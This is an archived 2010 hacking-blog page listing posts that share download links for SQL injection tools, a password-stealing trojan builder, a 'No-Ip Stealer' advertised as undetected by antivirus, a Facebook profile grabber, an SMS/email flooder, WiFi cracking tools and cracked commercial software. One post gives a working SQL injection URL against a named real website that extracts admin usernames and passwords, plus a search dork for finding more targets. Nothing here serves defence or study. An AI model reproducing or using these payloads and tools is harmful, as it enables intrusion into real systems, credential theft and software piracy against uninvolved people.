March 2010 | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

PHP Designer 2010 v7.1.0.31



PHP Designer 2010 v7.1.0.31 PHP Designer 2010 v7.1.0.31 | 28.9 MB PHP DESIGNER was created to help you enhance the process of edit, debug, analyze and publish PHP scripts all wrapped into a sophisticated streamlined interface!Get the complete IDE....

Read More Add your Comment 0 comments


March 30th, 2010 PenTBox – Penetration Testing Security Suite



PenTBox is a Security Suite that packs security and stability testing oriented tools for networks and systems. Programmed in Ruby and oriented to GNU/Linux systems, but compatible with Windows, MacOS and every systems where Ruby works. It is free, licensed under GNU/GPLv3. PenTBox Contains Cryptography tools Base64 Encoder & DecoderMulti-Digest (MD5, SHA1, SHA256, SHA384, SHA512)Hash Password Cracker (MD5, SHA1, SHA256, SHA384,...

Read More Add your Comment 0 comments


SQL video tutorials by Microsoft Certified Systems Engineer



SQL video tutorials by Microsoft Certified Systems Engineer SQL tutorial video by Microsoft certified Systems EngineerThis Transact SQL tutorial video is instructed by Microsoft certified Systems Engineer and Database administrator Mark Long....

Read More Add your Comment 0 comments


Ethical Hacking Video Tutorial Pack



Ethical Hacking Video Tutorial Pack Ethical Hacking Video Tutorial PackWMV3 WMV | 360x288 | Video: 198kbps, audio: 20kbps | 2.76GBVTC Ethical Hacking & PenetrationVTC Intro To Computer ForensicsAnkit Fadia Certified Ethical HackerVarious Linux...

Read More Add your Comment 0 comments


mysql magic_quotes_on bypass video



http://rapidshare.com/files/181224267/mysqlmagicquotes.rar.html...

Read More Add your Comment 0 comments


Working Injection tool by Pr0xY v2.2.0



Injection tool by Pr0xY v2.2.0 Code: +---------------------------------------++ Injection tool by Pr0xY ++ Version 2.2.0 ++---------------------------------------+Examples to use: *Mode(SQLi helper) : main.pl *Mode(Blind helper): main.pl blind *Mode(SQLi scanner): main.pl sis (automatic attack = 0 [0=false/1=true])* *Mode(AdminFinder) : main.pl adminFinder *Mode(FTP BF) : main.pl FTPbf...

Read More Add your Comment 0 comments


Injection tool by Pr0xY v2.2.0



Injection tool by Pr0xY v2.2.0 Code:+---------------------------------------++ Injection tool by Pr0xY ++ Version 2.2.0 ++---------------------------------------+Examples to use: *Mode(SQLi helper) : main.pl *Mode(Blind helper): main.pl blind *Mode(SQLi scanner): main.pl sis (automatic attack...

Read More Add your Comment 1 comments


socks grabber v.1__drogan__



socks grabber v.1__drogan__ Now you can see what's hidden Code: http://www.2shared.com/file/8424271/..._Drogan__.html ...

Read More Add your Comment 0 comments


PasswordsPro Tutorial (How to Crack hashes)



PasswordsPro Tutorial (How to Crack hashes) Hey guys, Just thought i would compile my recently obtained knowledge into a nice little Tutorial on the Basic use of PasswordsPro.My Tutorial will show you the 3 easiest Functions to make use of, Dictionary attack, Hybrid attack and Brute Force Attack.Before we begin,...

Read More Add your Comment 1 comments


Vulnerable SQL injection



http://centrofilipino.com/index.php?...ign=taurus&id=SQL:-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,p assword) FROM jos_users--some site in google searchthis bug is founded byHis0k4 [ALGERIAN HaCkEr]My Lesbian Radio - MyLesbianRadio.comWarwick Online - Hometype inurl:"com_jabode"if u found the user admin and pass/hashcrack...

Read More Add your Comment 0 comments


sql injection tool SIPT v4 A Real Devil For SQL....



sql injection tool SIPT v4 A Real Devil For SQL.... http://rapidshare.com/files/166834188/sipt.rar ...

Read More Add your Comment 3 comments


AKĐ SQL Injection 3.0 + source



AKĐ SQL Injection 3.0 + source Code: File .exe :http://www.aokhoacden.com/dl/akd-injection3.zipSource :http://www.aokhoacden.com/dl/akd-source.z...

Read More Add your Comment 0 comments


10 Tricks to Exploit SQL Sites



Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems....

Read More Add your Comment 0 comments


10 Tricks to Exploit SQL Sites



Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems....

Read More Add your Comment 1 comments


WIFI Hacking Tools Browse Internet For Free



I am adding some tools that one can use for hacking a protected WIFI Network.Some of the included applications are-WIFI RadarAircrack-2.3 802.11 sniffer and WEP/WPA key crackerEasy to use wifi key finder even find key at 128-bit encryption..WPA-PSK you name it you will find it.Download: Download WiFi_Hack_Tools.zip for free on uploading.comDownload WFSIC.rar for free on uploading.com ...

Read More Add your Comment 0 comments


Facebook Profile Grabber



Size: 25 MBDownload: http://rapidshare.com/files/36004325...le_grabber.rar ...

Read More Add your Comment 2 comments


Working PAssword Stealer



nstruction:put your e-mailname of the serverthen click make trojan. (note: if you dont want to get infected dont click the server.)Its Working i have tested http://www.4shared.com/file/80052720/d78faa3c/KPS_10_By_Knight.html ...

Read More Add your Comment 0 comments


Hide My Ass Pro VPN v1.8!



I took one for the team and bought this, now I uploaded exe for it to be crackedDownload: http://rapidshare.com/files/36390045...__Pro_v1.8.zipIf you have the skills you can be the FIRST crack one of the best vpn software out there. ...

Read More Add your Comment 0 comments


Troxin Flooder[SMS/EMAIL] [BOMBER]



This is a program I was working on for two weeks. How did this program take two weeks to make? I did not use/leech any code. I did this program without the help of a source. Now I had a WAY better GUI, but due to the fact that I wanted to release to whomever wanted this, I deleted a lot of things. Yeah the GUI looks bad to you maybe,...

Read More Add your Comment 0 comments


No-Ip Stealer



File InfoReport date: 2010-03-23 14:05:37 (GMT 1)File name: Stub.exeFile size: 744448 bytesMD5 Hash: 7e12bced1ad7ae7480fdadd36410d175SHA1 Hash: fdd7ba82110e4f94ce0bf1af1843e517cbf5ad23Detection rate: 0 on 21 (0%)Status: CLEANDetectionsa-squared - -Avast - -AVG - -Avira AntiVir - -BitDefender - -ClamAV - -Comodo - -Dr.Web -...

Read More Add your Comment 1 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com